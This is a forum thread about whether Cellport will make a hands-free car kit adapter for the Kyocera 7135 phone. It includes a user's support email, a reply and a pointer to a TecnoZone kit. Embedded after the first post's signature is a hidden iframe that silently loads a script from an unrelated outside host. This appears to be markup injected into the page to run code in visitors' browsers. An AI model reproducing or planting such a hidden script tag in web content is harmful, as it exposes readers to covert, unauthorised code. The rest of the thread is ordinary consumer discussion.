+ Reply to Thread

Cellport - Possible installed hands free kit option

For those who don't know, Cellport makes custom adapters that plug into a universal car kit. The neat idea of this is that if you SO has a different phone, they can use the same base HFK and just get a different adapter.

Anyway, they had signed an agreement in November 2001 with Kyocera and mention the 6035 in the press release. My guess is that with the 7135 around the corner, they didn't want to develop for the 6035 which might be outdated by the time they released the adapter. I am hoping they just figured they would jumped ahead to the 7135. I sent them an email to see if they have any plans.

Sean

To: support@cellport.com
    Subject: Module for Kyocera 7135

I wanted to inquire about the possible development of an adapter for the Kyocera 7135. While it has only been released by one carrier so far. There are a large # of people who have already bought this phone. From the discussion groups I frequent, there are quite a number of people who are looking for a proper installed car kit to work with this phone. Do you have any plans for this adapter?

Kindest regards,

Sean Decker

----- "The obscure we see eventually, the completely
    apparent takes longer." ----- Edward R. Murrow<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Cellport - Possible installed hands free kit option

If I recall properly there was a discussion about CELPORT that was in the 6035 section of this board last year at some point.

Would be nice if they came up with the adapter. I'd be curious if they do.

Jeff

Originally posted by entropy
    For those who don't know, Cellport makes custom adapters that plug into a universal car kit. The neat idea of this is that if you SO has a different phone, they can use the same base HFK and just get a different adapter.

Anyway, they had signed an agreement in November 2001 with Kyocera and mention the 6035 in the press release. My guess is that with the 7135 around the corner, they didn't want to develop for the 6035 which might be outdated by the time they released the adapter. I am hoping they just figured they would jumped ahead to the 7135. I sent them an email to see if they have any plans.

Sean

To: support@cellport.com
    Subject: Module for Kyocera 7135

I wanted to inquire about the possible development of an adapter for the Kyocera 7135. While it has only been released by one carrier so far. There are a large # of people who have already bought this phone. From the discussion groups I frequent, there are quite a number of people who are looking for a proper installed car kit to work with this phone. Do you have any plans for this adapter?

Kindest regards,

Sean Decker

----- "The obscure we see eventually, the completely
    apparent takes longer." ----- Edward R. Murrow
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

i have the TecnoZone Rover i bought at CompUSA it works fine and if i ever ever change phones all i have to do is change this removable cord.

here is there website, real nice stuff http://www.tecnozone.com/prodshelf.asp

Originally posted by tmonkey
    i have the TecnoZone Rover i bought at CompUSA it works fine and if i ever ever change phones all i have to do is change this removable cord.

here is there website, real nice stuff http://www.tecnozone.com/prodshelf.asp
    Do you know whether the adapter shown on the website for the 6035 work with the 7135?